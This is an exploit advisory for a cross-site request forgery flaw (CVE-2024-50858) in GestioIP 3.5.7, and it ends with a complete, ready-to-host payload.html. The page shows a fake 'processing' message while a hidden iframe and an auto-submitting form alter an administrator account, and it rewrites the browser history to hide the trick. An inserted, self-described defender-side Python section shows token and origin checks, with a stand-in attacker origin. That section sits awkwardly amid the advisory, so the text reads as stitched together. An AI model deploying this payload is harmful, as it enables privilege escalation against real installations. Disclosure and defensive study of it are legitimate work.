
# Exploit Title: GestioIP 3.5.7 - GestioIP Vulnerability: Auth. Cross-Site Request Forgery (CSRF)
# Exploit Author: m4xth0r (Maximiliano Belino)
# Author website: https://maxibelino.github.io/
# Author email : max.cybersecurity at belino.com
# GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-50858
# Date: 2025-01-13
# Vendor Homepage: https://www.gestioip.net/
# Software Link: https://www.gestioip.net/en/download/
# Version: GestioIP v3.5.7
# Tested on: Kali Linux
# CVE: CVE-2024-50858

### Description

Many GestioIP endpoints are vulnerable to CSRF. This allows an attacker to execute actions in the application through the administrator's browser if the administrator visits a malicious URL hosted by the attacker. These actions can modify, delete, or exfiltrate application data.

### Prerequisites

The option "Manage - Manage GestioIP - User Management" must already be enabled.

### Usage

To exploit this vulnerability, an attacker hosts `payload.html` on an attacker-controlled web server (e.g. `python3 -m http.server 8090`). When an authenticated administrator visits the attacker's website, the CSRF request executes, making the attacker an administrator.

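As an added, defender-side example (not part of this advisory and not GestioIP's own code, which is Perl CGI), the following Python shows the kind of server-side check that rejects the request the hidden form above sends: a per-session synchronizer token compared in constant time, plus an Origin / Sec-Fetch-Site check. The site origin is taken from the PoC's form action; the session secret, session id and request headers are constructed assumptions.

```python
import hashlib
import hmac
from urllib.parse import urlparse

# Origin of the GestioIP install, taken from the PoC's form action (assumed).
SITE_ORIGIN = "http://localhost"
# Constructed session material; a real server takes these from its session store.
SESSION_SECRET = b"constructed-server-secret"
SESSION_ID = "admin-session-0001"


def issue_csrf_token(session_secret: bytes, session_id: str) -> str:
    """Per-session synchronizer token the server embeds in each state-changing form."""
    return hmac.new(session_secret, session_id.encode(), hashlib.sha256).hexdigest()


def is_same_site(headers: dict) -> bool:
    """Prefer Fetch Metadata; fall back to Origin/Referer; no origin at all is rejected."""
    fetch_site = headers.get("Sec-Fetch-Site")
    if fetch_site is not None:
        return fetch_site in ("same-origin", "none")
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parsed = urlparse(source)
    return f"{parsed.scheme}://{parsed.netloc}" == SITE_ORIGIN


def accept_state_change(session_id: str, headers: dict, form: dict) -> bool:
    """Accept a POST (e.g. to ip_mod_user.cgi) only if token and site checks both pass."""
    expected = issue_csrf_token(SESSION_SECRET, session_id)
    token_ok = hmac.compare_digest(expected, form.get("csrf_token", ""))
    return token_ok and is_same_site(headers)


# Constructed request as the hidden-iframe form would send it: the admin's session
# cookie rides along, but there is no token and the browser marks it cross-site.
POC_HEADERS = {"Origin": "http://attacker.example:8090", "Sec-Fetch-Site": "cross-site"}
POC_FORM = {"name": "maxi", "group_id": "1", "email": "maxi@test.com", "phone": "123",
            "comment": "", "client_id": "1", "id": "2", "B2": ""}


def poc_request_accepted() -> bool:
    return accept_state_change(SESSION_ID, POC_HEADERS, POC_FORM)


def legitimate_request_accepted() -> bool:
    """Same edit submitted from GestioIP's own user-management page."""
    form = dict(POC_FORM, csrf_token=issue_csrf_token(SESSION_SECRET, SESSION_ID))
    return accept_state_change(SESSION_ID, {"Sec-Fetch-Site": "same-origin"}, form)
```

Rejected cross-site POSTs to state-changing endpoints are also worth logging with their Origin header, since a burst of them against one admin session is the observable trace of an attempt like this one.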
### File: payload.html

#### example: editing user named 'maxi'

```html
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to our site</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            text-align: center;
        }
        .container {
            margin-top: 50px;
        }
        iframe {
            display: none;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Thank you for visiting our site!</h1>
        <p>We are processing your request, please wait a moment...</p>
        <img src="https://placehold.co/150?text=Processing" alt="Processing...">
    </div>

    <!-- hidden iframe -->
    <iframe name="hiddenFrame"></iframe>

    <!-- The form that makes the POST to GestioIP Server -->
    <form action="http://localhost/gestioip/res/ip_mod_user.cgi" method="POST" target="hiddenFrame">
        <input type="hidden" name="name" value="maxi">
        <input type="hidden" name="group_id" value="1">
        <input type="hidden" name="email" value="maxi@test.com">
        <input type="hidden" name="phone" value="123">
        <input type="hidden" name="comment" value="">
        <input type="hidden" name="client_id" value="1">
        <input type="hidden" name="id" value="2">
        <input type="hidden" name="B2" value="">
    </form>

    <script>
        history.pushState('', '', '/');
        document.forms[0].submit();
    </script>
</body>
</html>
```